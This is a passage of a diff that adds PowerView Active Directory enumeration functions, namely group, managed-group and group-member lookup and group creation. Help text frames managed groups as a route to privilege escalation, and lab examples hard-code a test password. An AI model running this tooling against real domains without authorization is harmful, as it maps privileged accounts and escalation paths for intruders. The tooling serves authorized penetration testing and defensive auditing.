($ConvertedIdentityInstance) { + $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $GroupName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$GroupName)" + $SearcherArguments['Domain'] = $GroupDomain + Write-Verbose "[Get-DomainGroup] Extracted domain '$GroupDomain' from '$IdentityInstance'" + $GroupSearcher = Get-DomainSearcher @SearcherArguments + } + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance))" + } + } + + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['AdminCount']) { + Write-Verbose '[Get-DomainGroup] Searching for adminCount=1' + $Filter += '(admincount=1)' + } + if ($PSBoundParameters['GroupScope']) { + $GroupScopeValue = $PSBoundParameters['GroupScope'] + $Filter = Switch ($GroupScopeValue) { + 'DomainLocal' { '(groupType:1.2.840.113556.1.4.803:=4)' } + 'NotDomainLocal' { '(!(groupType:1.2.840.113556.1.4.803:=4))' } + 'Global' { '(groupType:1.2.840.113556.1.4.803:=2)' } + 'NotGlobal' { '(!(groupType:1.2.840.113556.1.4.803:=2))' } + 'Universal' { '(groupType:1.2.840.113556.1.4.803:=8)' } + 'NotUniversal' { '(!(groupType:1.2.840.113556.1.4.803:=8))' } + } + Write-Verbose "[Get-DomainGroup] Searching for group scope '$GroupScopeValue'" + } + if ($PSBoundParameters['GroupProperty']) { + $GroupPropertyValue = $PSBoundParameters['GroupProperty'] + $Filter = Switch ($GroupPropertyValue) { + 'Security' { '(groupType:1.2.840.113556.1.4.803:=2147483648)' } + 'Distribution' { '(!(groupType:1.2.840.113556.1.4.803:=2147483648))' } + 'CreatedBySystem' { '(groupType:1.2.840.113556.1.4.803:=1)' } + 'NotCreatedBySystem' { '(!(groupType:1.2.840.113556.1.4.803:=1))' } + } + Write-Verbose "[Get-DomainGroup] Searching for group property '$GroupPropertyValue'" + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainGroup] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $GroupSearcher.filter = "(&(objectCategory=group)$Filter)" + Write-Verbose "[Get-DomainGroup] filter string: $($GroupSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $GroupSearcher.FindOne() } + else { $Results = $GroupSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Group = $_ + } + else { + $Group = Convert-LDAPProperty -Properties $_.Properties + } + $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group') + $Group + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGroup] Error disposing of the Results object" + } + } + $GroupSearcher.dispose() + } + } + } +} + + +function New-DomainGroup { +<# +.SYNOPSIS + +Creates a new domain group (assuming appropriate permissions) and returns the group object. + +TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.GroupPrincipal with the specified +group properties. + +.PARAMETER SamAccountName + +Specifies the Security Account Manager (SAM) account name of the group to create. +Maximum of 256 characters. Mandatory. + +.PARAMETER Name + +Specifies the name of the group to create. If not provided, defaults to SamAccountName. + +.PARAMETER DisplayName + +Specifies the display name of the group to create. If not provided, defaults to SamAccountName. + +.PARAMETER Description + +Specifies the description of the group to create. + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' + +Creates the 'TestGroup' group with the specified description. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred + +Creates the 'TestGroup' group with the specified description using the specified alternate credentials. + +.OUTPUTS + +DirectoryServices.AccountManagement.GroupPrincipal +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.GroupPrincipal')] + Param( + [Parameter(Mandatory = $True)] + [ValidateLength(0, 256)] + [String] + $SamAccountName, + + [ValidateNotNullOrEmpty()] + [String] + $Name, + + [ValidateNotNullOrEmpty()] + [String] + $DisplayName, + + [ValidateNotNullOrEmpty()] + [String] + $Description, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ + 'Identity' = $SamAccountName + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($Context.Context) + + # set all the appropriate group parameters + $Group.SamAccountName = $Context.Identity + + if ($PSBoundParameters['Name']) { + $Group.Name = $Name + } + else { + $Group.Name = $Context.Identity + } + if ($PSBoundParameters['DisplayName']) { + $Group.DisplayName = $DisplayName + } + else { + $Group.DisplayName = $Context.Identity + } + + if ($PSBoundParameters['Description']) { + $Group.Description = $Description + } + + Write-Verbose "[New-DomainGroup] Attempting to create group '$SamAccountName'" + try { + $Null = $Group.Save() + Write-Verbose "[New-DomainGroup] Group '$SamAccountName' successfully created" + $Group + } + catch { + Write-Warning "[New-DomainGroup] Error creating group '$SamAccountName' : $_" + } + } +} + + +function Get-DomainManagedSecurityGroup { +<# +.SYNOPSIS + +Returns all security groups in the current (or target) domain that have a manager set. + +Author: Stuart Morgan (@ukstufus) , Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl + +.DESCRIPTION + +Authority to manipulate the group membership of AD security groups and distribution groups +can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically +used to delegate management authority to distribution groups, but Windows supports security groups +being managed in the same way. + +This function searches for AD groups which have a group manager set, and determines whether that +user can manipulate group membership. This could be a useful method of horizontal privilege +escalation, especially if the manager can manipulate the membership of a privileged group. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv + +Store a list of all security groups with managers in group-managers.csv + +.OUTPUTS + +PowerView.ManagedSecurityGroup + +A custom PSObject describing the managed security group. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ManagedSecurityGroup')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{ + 'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))' + 'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname' + } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + $SearcherArguments['Domain'] = $Domain + $TargetDomain = $Domain + } + else { + $TargetDomain = $Env:USERDNSDOMAIN + } + + # go through the list of security groups on the domain and identify those who have a manager + Get-DomainGroup @SearcherArguments | ForEach-Object { + $SearcherArguments['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid' + $SearcherArguments['Identity'] = $_.managedBy + $Null = $SearcherArguments.Remove('LDAPFilter') + + # $SearcherArguments + # retrieve the object that the managedBy DN refers to + $GroupManager = Get-DomainObject @SearcherArguments + # Write-Host "GroupManager: $GroupManager" + $ManagedGroup = New-Object PSObject + $ManagedGroup | Add-Member Noteproperty 'GroupName' $_.samaccountname + $ManagedGroup | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname + $ManagedGroup | Add-Member Noteproperty 'ManagerName' $GroupManager.samaccountname + $ManagedGroup | Add-Member Noteproperty 'ManagerDistinguishedName' $GroupManager.distinguishedName + + # determine whether the manager is a user or a group + if ($GroupManager.samaccounttype -eq 0x10000000) { + $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'Group' + } + elseif ($GroupManager.samaccounttype -eq 0x30000000) { + $ManagedGroup | Add-Member Noteproperty 'ManagerType' 'User' + } + + $ACLArguments = @{ + 'Identity' = $_.distinguishedname + 'RightsFilter' = 'WriteMembers' + } + if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential } + + # # TODO: correct! + # # find the ACLs that relate to the ability to write to the group + # $xacl = Get-DomainObjectAcl @ACLArguments -Verbose + # # $ACLArguments + # # double-check that the manager + # if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AceType -eq 'AccessAllowed' -and ($xacl.ObjectSid -eq $GroupManager.objectsid)) { + # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $True + # } + # else { + # $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $False + # } + + $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN' + + $ManagedGroup.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup') + $ManagedGroup + } + } +} + + +function Get-DomainGroupMember { +<# +.SYNOPSIS + +Return the members of a specific domain group. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for the specified +group matching the criteria. Each result is then rebound and the full user +or group object is returned. + +.PARAMETER Identity + +A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Recurse + +Switch. If the group member is a group, recursively try to query its members as well. + +.PARAMETER RecurseUsingMatchingRule + +Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse. +Much faster than manual recursion, but doesn't reveal cross-domain groups, +and only returns user accounts (no nested group objects themselves). + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainGroupMember "Desktop Admins" + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +.EXAMPLE + +'Desktop Admins' | Get-DomainGroupMember -Recurse + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Testing Group +GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +.EXAMPLE + +Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +.EXAMPLE + +Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember + +.EXAMPLE + +'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins' + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +'dev\domain admins' | Get-DomainGroupMember -Verbose +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainGroupMember] Extracted domain 'dev.testlab.local' from 'dev\domain admins' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins))) +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local))) + +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : user1 +MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108 + +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local))) +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : Administrator +MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-500 + +.OUTPUTS + +PowerView.GroupMember + +Custom PSObject with translated group member property fields. + +.LINK + +http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.GroupMember')] + [CmdletBinding(DefaultParameterSetName = 'None')] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Parameter(ParameterSetName = 'ManualRecurse')] + [Switch] + $Recurse, + + [Parameter(ParameterSetName = 'RecurseUsingMatchingRule')] + [Switch] + $RecurseUsingMatchingRule, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'member,samaccountname,distinguishedname' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $ADNameArguments = @{} + if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + } + + PROCESS { + $GroupSearcher = Get-DomainSearcher @SearcherArguments + if ($GroupSearcher) { + if ($PSBoundParameters['RecurseUsingMatchingRule']) { + $SearcherArguments['Identity'] = $Identity + $SearcherArguments['Raw'] = $True + $Group = Get-DomainGroup @SearcherArguments + + if (-not $Group) { + Write-Warning "[Get-DomainGroupMember] Error searching for group with identity: $Identity" + } + else { + $GroupFoundName = $Group.properties.item('samaccountname')[0] + $GroupFoundDN = $Group.properties.item('distinguishedname')[0] + + if ($PSBoundParameters['Domain']) { + $GroupFoundDomain = $Domain + } + else { + # if a domain isn't passed, try to extract it from the found group distinguished name + if ($GroupFoundDN) { + $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + } + Write-Verbose "[Get-DomainGroupMember] Using LDAP matching rule to recurse on '$GroupFoundDN', only user accounts will be returned." + $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupFoundDN))" + $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName')) + $Members = $GroupSearcher.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]} + } + $Null = $SearcherArguments.Remove('Raw') + } + else { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainGroupMember] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $GroupSearcher = Get-DomainSearcher @SearcherArguments + if (-not $GroupSearcher) { + Write-Warning "[Get-DomainGroupMember] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $GroupName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$GroupName)" + $SearcherArguments['Domain'] = $GroupDomain + Write-Verbose "[Get-DomainGroupMember] Extracted domain '$GroupDomain' from '$IdentityInstance'" + $GroupSearcher = Get-DomainSearcher @SearcherArguments + } + } + else { + $IdentityFilter += "(samAccountName=$IdentityInstance)" + } + } + + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainGroupMember] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $GroupSearcher.filter = "(&(objectCategory=group)$Filter)" + Write-Verbose "[Get-DomainGroupMember] Get-DomainGroupMember filter string: $($GroupSearcher.filter)" + try { + $Result = $GroupSearcher.FindOne() + } + catch { + Write-Warning "[Get-DomainGroupMember] Error searching for group with identity '$Identity': $_" + $Members = @() + } + + $GroupFoundName = '' + $GroupFoundDN = '' + + if ($Result) { + $Members = $Result.properties.item('member') + + if ($Members.count -eq 0) { + # ranged searching, thanks @meatballs__ ! + $Finished = $False + $Bottom = 0 + $Top = 0 + + while (-not $Finished) { + $Top = $Bottom + 1499 + $MemberRange="member;range=$Bottom-$Top" + $Bottom += 1500 + $Null = $GroupSearcher.PropertiesToLoad.Clear() + $Null = $GroupSearcher.PropertiesToLoad.Add("$MemberRange") + $Null = $GroupSearcher.PropertiesToLoad.Add('samaccountname') + $Null = $GroupSearcher.PropertiesToLoad.Add('distinguishedname') + + try { + $Result = $GroupSearcher.FindOne() + $RangedProperty = $Result.Properties.PropertyNames -like "member;range=*" + $Members += $Result.Properties.item($RangedProperty) + $GroupFoundName = $Result.properties.item('samaccountname')[0] + $GroupFoundDN = $Result.properties.item('distinguishedname')[0] + + if ($Members.count -eq 0) { + $Finished = $True + } + } + catch [System.Management.Automation.MethodInvocationException] { + $Finished = $True + } + } + } + else { + $GroupFoundName = $Result.properties.item('samaccountname')[0] + $GroupFoundDN = $Result.properties.item('distinguishedname')[0] + $Members += $Result.Properties.item($RangedProperty) + } + + if ($PSBoundParameters['Domain']) { + $GroupFoundDomain = $Domain + } + else { + # if a domain isn't passed, try to extract it from the found group distinguished name + if ($GroupFoundDN) { + $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + } + } + } + + ForEach ($Member in $Members) { + if ($Recurse -and $UseMatchingRule) { + $Properties = $_.Properties + } + else { + $ObjectSearcherArguments = $SearcherArguments.Clone() + $ObjectSearcherArguments['Identity'] = $Member + $ObjectSearcherArguments['Raw'] = $True + $ObjectSearcherArguments['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass' + $Object = Get-DomainObject @ObjectSearcherArguments + $Properties = $Object.Properties + } + + if ($Properties) { + $GroupMember = New-Object PSObject + $GroupMember | Add-Member Noteproperty 'GroupDomain' $GroupFoundDomain + $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName + $GroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupFoundDN + + if ($Properties.objectsid) { + $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectsid[0], 0).Value) + } + else { + $MemberSID = $Null + } + + try { + $MemberDN = $Properties.distinguishedname[0] + if ($MemberDN -match 'ForeignSecurityPrincipals|S-1-5-21') { + try { + if (-not $MemberSID) { + $MemberSID = $Properties.cn[0] + } + $MemberSimpleName = Convert-ADName -Identity $MemberSID -OutputType 'DomainSimple' @ADNameArguments + + if ($MemberSimpleName) { + $MemberDomain = $MemberSimpleName.Split('@')[1] + } + else { + Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN" + $MemberDomain = $Null + } + } + catch { + Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN" + $MemberDomain = $Null + } + } + else { + # extract the FQDN from the Distinguished Name + $MemberDomain = $MemberDN.SubString($MemberDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + } + catch { + $MemberDN = $Null + $MemberDomain = $Null + } + + if ($Properties.samaccountname) { + # forest users have the samAccountName set + $MemberName = $Properties.samaccountname[0] + } + else { + # external trust users have a SID, so convert it + try { + $MemberName = ConvertFrom-SID -ObjectSID $Properties.cn[0] @ADNameArguments + } + catch { + # if there's a problem contacting the domain to resolve the SID + $MemberName = $Properties.cn[0] + } + } + + if ($Properties.objectclass -match 'computer') { + $MemberObjectClass = 'computer' + } + elseif ($Properties.objectclass -match 'group') { + $MemberObjectClass = 'group' + } + elseif ($Properties.objectclass -match 'user') { + $MemberObjectClass = 'user' + } + else { + $MemberObjectClass = $Null + } + $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain + $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName + $GroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDN + $GroupMember | Add-Member 